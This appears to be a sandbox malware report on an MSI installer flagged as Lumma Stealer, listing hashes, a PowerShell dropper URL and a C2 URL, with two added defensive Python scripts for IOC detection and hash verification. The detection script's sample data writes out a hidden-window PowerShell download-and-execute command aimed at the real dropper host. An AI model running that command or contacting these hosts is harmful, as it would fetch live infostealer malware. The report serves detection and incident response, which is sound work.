General

  • Target

    5b790d2d085d2498aa63822812562acc256a26febae6cc78563ba656eb9d0c1f.zip

  • Size

    51.1MB

  • Sample

    241002-bnst8atdra

  • MD5

    c421f2ae1826f36d1224070127bb50ef

  • SHA1

    347fd2d1cfc0000c9b7f8525852cecd438692523

  • SHA256

    5b790d2d085d2498aa63822812562acc256a26febae6cc78563ba656eb9d0c1f

  • SHA512

    d5761f517467c36540d9998b20c2dbf9a745de602fa558ea5ae2b9080248374f72372ff73d204836dfb75fea6362ae688c77ac4704e4825e3d743949bb012421

  • SSDEEP

    1572864:amp+AkxOx6mkMspNbawUPlE6bvgqqkzST1T5g9JWicwZKFct:ao+M6mk5pshPlE6bIqnzE15g9otAKFct

Malware Config

  • Extracted

    • Language

      ps1

    • Deobfuscated URLs

      ps1.dropper: https://last-blink.com/2709.bs64

  • Extracted

    • Family

      lumma

    • C2

      https://gravvitywio.store/api
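The two URLs above, together with the hidden-window PowerShell behaviour flagged on the MSI under Targets, are what a responder turns into detections. The following is an added example, not part of the sandbox report: it matches constructed process-creation and proxy telemetry against the report's network indicators and against generic command-line traits of a hidden PowerShell download cradle. The URLs are copied from the extracted config; the log records, the heuristic regexes and the `score_process`/`match_url`/`triage` helper names are assumptions for the demo, since the report does not reproduce the dropper's actual command line.

```python
"""Added example (not from the report): run the report's network indicators and
the hidden-window PowerShell behaviour over constructed telemetry."""
import re
from urllib.parse import urlparse

# Indicators copied from the report's extracted config.
DROPPER_URL = "https://last-blink.com/2709.bs64"   # ps1.dropper
C2_URL = "https://gravvitywio.store/api"           # lumma C2
IOC_URLS = {DROPPER_URL, C2_URL}
IOC_HOSTS = sorted({urlparse(u).hostname for u in IOC_URLS})

# Command-line traits of "run PowerShell with a hidden window" plus common
# download-cradle markers. Generic heuristics, not taken from the report.
HIDDEN_WINDOW = re.compile(r"-w[indowstyle]*\s+(?:hidden|1)\b", re.I)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression", re.I)
POWERSHELL = ("powershell.exe", "pwsh.exe")


def score_process(image: str, cmdline: str) -> list[str]:
    """Reasons a process-creation event resembles the PowerShell dropper ([] if none)."""
    if image.lower().replace("/", "\\").rsplit("\\", 1)[-1] not in POWERSHELL:
        return []
    reasons = []
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden window")
    if ENCODED_CMD.search(cmdline):
        reasons.append("encoded command")
    if CRADLE.search(cmdline):
        reasons.append("download cradle")
    reasons += [f"ioc host {h}" for h in IOC_HOSTS if h in cmdline.lower()]
    return reasons


def match_url(url: str) -> str:
    """'url' for an exact IOC hit, 'host' for the same host, '' otherwise."""
    if url in IOC_URLS:
        return "url"
    return "host" if (urlparse(url).hostname or "") in IOC_HOSTS else ""


def triage(events: list[dict]) -> list[tuple[str, str]]:
    """Return (event id, verdict) for every event that hits; clean events are dropped."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            reasons = score_process(ev["image"], ev["cmdline"])
            if reasons:
                hits.append((ev["id"], "; ".join(reasons)))
        elif ev["type"] == "http":
            kind = match_url(ev["url"])
            if kind:
                hits.append((ev["id"], f"ioc {kind} match"))
    return hits


# Constructed sample telemetry (Sysmon-style process creations and proxy requests).
SAMPLE_EVENTS = [
    {"id": "p1", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://last-blink.com/2709.bs64')\""},
    {"id": "p2", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"id": "p3", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"id": "n1", "type": "http", "url": "https://gravvitywio.store/api"},
    {"id": "n2", "type": "http", "url": "https://last-blink.com/other.bin"},
    {"id": "n3", "type": "http", "url": "https://example.com/"},
]

if __name__ == "__main__":
    for event_id, verdict in triage(SAMPLE_EVENTS):
        print(event_id, verdict)
```

The host-level match is deliberately reported separately from the exact-URL match: infostealer C2 paths rotate while the domain stays, so a same-host hit on a fresh path is still worth a ticket. The command-line heuristics are noisy on their own (admin scripts also run with `-w hidden`), which is why `score_process` returns the list of reasons rather than a verdict, and a single "hidden window" reason without a cradle or an IOC host should rank low.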

Targets

    • Target

      Sgrm/samcli.dll

    • Size

      81KB

    • MD5

      88fc8a7c285558b7f502f1a4c7f66314

    • SHA1

      6ccceff830bf6683a4c20e64654fd05a12f40406

    • SHA256

      09a086e2575c72f0835b7df861f219ad58b80f3a6318d44be29f4fde36a57f3c

    • SHA512

      89bb84e876368d457d63471072ebd45c2801a329e83ca400a9eee9864449cd4a3bc8c779b184929ff797074bf160258f6388779549c42d54d001fe21c550d947

    • SSDEEP

      1536:/pGdBAtLXW/2hUqNYgUYYYTzwc/g3+asq1itSbdsd:/pTiOpYKYYTzz/g3+Ztya

    Score
    1/10
    • Target

      Sgrm/samlib.dll

    • Size

      136KB

    • MD5

      f7f0b9e790bcd33c30480c71eb4fa1e8

    • SHA1

      69cf3f2b3a42a04661ed97afc840718acea7ddf1

    • SHA256

      70515c36ffa220475e2d1816611320ffabf1102f1db11d3333780dcad2bb5f69

    • SHA512

      11932fb84f4812ce9e8205c60d121a628feeb00f445a446a73cb90f85b39b88350548a0eb24a8131c03b51aac663b0a9998e111aedcda788e9087b444677814d

    • SSDEEP

      3072:8w7ztRF/xFptOaYcfBvknaGrGzLona9LdYl7AS4:8WtRF/xFpIfc5vkhrGzLonflES

    Score
    4/10
    • Target

      Sgrm/sas.dll

    • Size

      14KB

    • MD5

      5f46fec4bca81562f8702650705b86d3

    • SHA1

      c974e9c0f66ee41eedd15d902a9113d97291bf56

    • SHA256

      7d78f5e2102c8e12b591e8c38c95f400a4b3cc3ce911f26b9453d5aaf7f8532d

    • SHA512

      8adec668d362f2b3bcc4a0587849c5e279e154b5dce20b52ec89ae2399fbfb3335235dcb173f3a93a9d501a9a58b1f5b2178f5a53cb5400d75c82f5aff95861a

    • SSDEEP

      384:czK80Jwm4e1F4HR6661hS666r63VnH/YkyvgbbWMwW:cm8D73YMbr

    Score
    1/10
    • Target

      app__v7.3.5_.msi

    • Size

      54.5MB

    • MD5

      2d6151dbbbb50c077564ef7ffc971a4e

    • SHA1

      b67ec6dd683f5f8b12d52aa79aeee9a498380589

    • SHA256

      2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd

    • SHA512

      22a30787cf820da489ed59b8f6401b1282b923a66f796211c2300f1864f4f10bee01d24133bfcb35975695f32273796cacdef03d726345c7a12cfb8ce6509979

    • SSDEEP

      1572864:0p+Ty2SfWnHDk8FjVbfzPTq4h+RZYoFczfDiQPU8azMCAJ:h/0WnHDkkjBPTq4kYoFefTPU8awCm

    • Lumma Stealer, LummaC

      Lumma (LummaC) is an infostealer written in C++, first seen in August 2022.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with a hidden display window.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Suspicious use of SetThreadContext

    • Target

      wbem/appbackgroundtask.dll

    • Size

      39KB

    • MD5

      f29672bfb0fbe6ab0e243b8f747c2a2b

    • SHA1

      d6aa9d19add28c56e51c9f68f3357d7f5bd73855

    • SHA256

      5c8fabc6deb9e31de141babba94bace2446e89ce7b1888c6d0feca49ccadc67f

    • SHA512

      37323b3f29b0511ddf2671f56f27c77c34ca6b3eabdca02ae6199ad4ce17c5db6898534d5e9120423dc4a79733f4173de0217f3dbf0d9effba8e0426201a6dba

    • SSDEEP

      768:DJgqRCBUTGAf8btSazYgg71sUE49nsX6cIIUs5QLnzN4Gi:arKvf8bEtD171dsEIF5QLJ4Gi

    Score
    1/10
    • Target

      wbem/dnsclientcim.dll

    • Size

      123KB

    • MD5

      b19e94b944bb06be96f9efc3abc0e6a4

    • SHA1

      4632a0b93f4fc3ced4a78f5719352febe2c26615

    • SHA256

      ee05a7de454b561b51d063913e084252f5f8f02868392eb93b5d0f01a364fe1e

    • SHA512

      7925a57c5ba1cf8883d3b9da30e1afd305b214029a98b7de0030b52a4cac46cb78141b8f79bb53995fadbc2f75a7366004e14525c4aedd6808394b42b166ae66

    • SSDEEP

      1536:FE2lWm+50IkaXuBKRLQ6VN7hPJxMbS9j1guZ3Km4HojqR:yujiuMhQ6VN7hPJxMbCj2uRKm4I

    Score
    1/10
    • Target

      wbem/dnsclientpsprovider.dll

    • Size

      187KB

    • MD5

      28b1abfb1ec9590e38bbdb750c2bc719

    • SHA1

      2ee1a1c8ae201c8a13ae719492d5c8bf2f33b929

    • SHA256

      cfd969c82c408d1cdbc0084736fd888d78c4a0e1dd5bb5873da9fe8bf0c35211

    • SHA512

      027b4fab4dc79622bb316f41c8b36d496649f6d67e50ae19d69ac09af2882e31219eec7c013223372bb1883ffa9831f2684404dcca19391e70319e11c5e6ec0d

    • SSDEEP

      3072:t8sFW4j9LlwNa/aoBEB6tCnrGNidonQMAQy8mVy+Uhw72:t8s3mafBOGNzLAQHmVyFhw

    Score
    1/10
    • Target

      winrm/AcLayers.dll

    • Size

      325KB

    • MD5

      3a515be88a59d8e0abaa0c299a5019b1

    • SHA1

      0af8f3d0d3a34032b285433728ab4017e5c4a2c6

    • SHA256

      5620f93cbde964ed16b7f3fadc74751e1867447a625da8593424ee3c2e0e7b8e

    • SHA512

      71fdf1ee7e4e3f3d498e19ebce5ff2c9e0ed6891bf39295821e376cf928b4abfaf292e8fe6299fecd5f04716186a5a7d29218096f6e2b3964c2b1aa4dd08ff82

    • SSDEEP

      6144:9BHWoCb3lqocQ5VcmFv6IjG6PQOymwXxzoi35K5w1FwvF:9BHWoI3lNcQ5VccVGK5+wN

    Score
    1/10
    • Target

      winrm/acledit.dll

    • Size

      11KB

    • MD5

      7c2b65e0756e0dc59e0be5d9efd25da0

    • SHA1

      f6303b5239dd8bd5153e7f7c3593cad714462373

    • SHA256

      b89c8b36a4af02d835dc07b7a905e1a3f95308aac92f614810dd69eb71d9fffb

    • SHA512

      3c76acd4f5963bd3ad7a14449dab8bd16e4bb6f8df01070d3907398be65be56935c8cf204fc1d47c12ce1eb5eacebc098845c6d4543189455c75f18d638f0cfa

    • SSDEEP

      96:lYEn2RqMoqNGINrOp2Q96GOGZgmPlx2sVN2est7hnlCdCEW1YTWw9:iE2Qt8/9hGOG7L2WUNhnlgPW2TW

    Score
    1/10
    • Target

      winrm/aclui.dll

    • Size

      574KB

    • MD5

      9e12cf3363f8dfc2b2624c4171183eab

    • SHA1

      fcf3c863523ac59dd9e1a030440a731a44b09194

    • SHA256

      e39cdcfd6859ccb705879cf9088522b43941db6ef5683d5719bdaa93340c35a4

    • SHA512

      2492baf066772d26004da646e2574210ddc279675d22f0836833b5953f6c4b2c1481377d7c1d67e205b27aba2381de606985ebb5b4c7360c13443d56110a3aa1

    • SSDEEP

      12288:hytiG4FyHoIoVFLZ0Lr+LhL1Kf0dUQK9zxSW3djeRG:0QG4w+FLmn+L3dTK9zxSW3djeR

    Score
    1/10
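The per-member hashes above are the handle a responder uses to confirm that what they unpacked locally is the same set of files the sandbox saw. Note that every DLL member listed carries the name of a Windows system DLL (samcli.dll, samlib.dll, sas.dll, appbackgroundtask.dll, dnsclientcim.dll, dnsclientpsprovider.dll, AcLayers.dll, acledit.dll, aclui.dll), so a hash match against this report only tells you that you hold the same file, not whether it is the signed Microsoft build; compare the 1/10-scored members against the copies in System32 as well. The following is an added example, not the report's or the sandbox's code: it re-hashes an unpacked tree and compares it with the SHA-256 values listed under Targets. The SHA-256 values are copied from the report; the on-disk layout mirroring the member paths (root/Sgrm/samcli.dll and so on) and the helper names are assumptions.

```python
"""Added example (not part of the report): re-hash files unpacked from the sample
and compare them with the per-member hashes listed under Targets."""
import hashlib
import sys
from pathlib import Path

# SHA-256 per member path, copied from the report. Add "md5"/"sha1" keys to an
# entry if you want those checked too; hash_file() computes all three in one pass.
REPORT_HASHES = {
    "Sgrm/samcli.dll": {"sha256": "09a086e2575c72f0835b7df861f219ad58b80f3a6318d44be29f4fde36a57f3c"},
    "Sgrm/samlib.dll": {"sha256": "70515c36ffa220475e2d1816611320ffabf1102f1db11d3333780dcad2bb5f69"},
    "Sgrm/sas.dll": {"sha256": "7d78f5e2102c8e12b591e8c38c95f400a4b3cc3ce911f26b9453d5aaf7f8532d"},
    "app__v7.3.5_.msi": {"sha256": "2eae05e829f353c9a8d01683187eb759dbf73f90ccd435f03d46761b03247fbd"},
    "wbem/appbackgroundtask.dll": {"sha256": "5c8fabc6deb9e31de141babba94bace2446e89ce7b1888c6d0feca49ccadc67f"},
    "wbem/dnsclientcim.dll": {"sha256": "ee05a7de454b561b51d063913e084252f5f8f02868392eb93b5d0f01a364fe1e"},
    "wbem/dnsclientpsprovider.dll": {"sha256": "cfd969c82c408d1cdbc0084736fd888d78c4a0e1dd5bb5873da9fe8bf0c35211"},
    "winrm/AcLayers.dll": {"sha256": "5620f93cbde964ed16b7f3fadc74751e1867447a625da8593424ee3c2e0e7b8e"},
    "winrm/acledit.dll": {"sha256": "b89c8b36a4af02d835dc07b7a905e1a3f95308aac92f614810dd69eb71d9fffb"},
    "winrm/aclui.dll": {"sha256": "e39cdcfd6859ccb705879cf9088522b43941db6ef5683d5719bdaa93340c35a4"},
}


def hash_file(path: Path) -> dict[str, str]:
    """Stream the file once through MD5, SHA-1 and SHA-256."""
    digests = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def verify_members(root, expected) -> dict[str, str]:
    """Per member: 'match', 'mismatch:<digests that differ>' or 'missing'."""
    results = {}
    for member, want in expected.items():
        path = Path(root) / member
        if not path.is_file():
            results[member] = "missing"
            continue
        got = hash_file(path)
        bad = [name for name, value in want.items() if got.get(name) != value.lower()]
        results[member] = "match" if not bad else "mismatch:" + ",".join(bad)
    return results


def unexpected_members(root, expected) -> list[str]:
    """Files under root that the report does not list; look at these first."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix()
                  for p in root.rglob("*")
                  if p.is_file() and p.relative_to(root).as_posix() not in expected)


if __name__ == "__main__":
    unpack_dir = sys.argv[1] if len(sys.argv) > 1 else "."
    for member, status in verify_members(unpack_dir, REPORT_HASHES).items():
        print(f"{status:12} {member}")
    for extra in unexpected_members(unpack_dir, REPORT_HASHES):
        print(f"{'unlisted':12} {extra}")
```

Run it as `python verify.py <unpack_dir>`. A "mismatch" on a member means you are not looking at the file the sandbox scored and should not reuse its score; an "unlisted" file is one the report never hashed. On a Windows host, `Get-AuthenticodeSignature` on the unpacked DLL and on the same-named file under `C:\Windows\System32` tells you whether the bundled copy is the signed Microsoft build or a replacement that only shares its name.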

MITRE ATT&CK Enterprise v15
